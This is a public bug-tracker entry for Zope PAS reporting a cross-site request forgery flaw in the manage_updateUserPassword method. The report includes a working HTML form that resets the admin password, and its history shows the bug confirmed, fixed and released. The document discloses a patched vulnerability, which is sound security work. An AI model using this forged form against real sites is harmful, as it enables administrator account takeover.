userManager manage_updateUserPassword csrf

Bug #1079204 reported by Thomas
This bug affects 1 person
Affects Status Importance Assigned to Milestone
Zope PAS
Tres Seaver

Bug Description

Following html allows the admin passwd to be reset :

<form action="https://SERVER/acl_users/userManager/manage_updateUserPassword" method="post" name="form">
 user_id : <input value="admin" name="user_id">
  password: <input value="zenoss26" name="password">
  confirm :<input value="zenoss26" name="confirm">
 <input type="submit">

Tres Seaver (tseaver)
Changed in zope-pas:
assignee: nobody → Tres Seaver (tseaver)
status: New → Confirmed
Revision history for this message
Tres Seaver (tseaver) wrote :
Changed in zope-pas:
status: Confirmed → Fix Committed
Tres Seaver (tseaver)
Changed in zope-pas:
status: Fix Committed → Fix Released
information type: Private Security → Public Security
To post a comment you must log in.
This report contains Public Security information  Edit
Everyone can see this security related information.

Other bug subscribers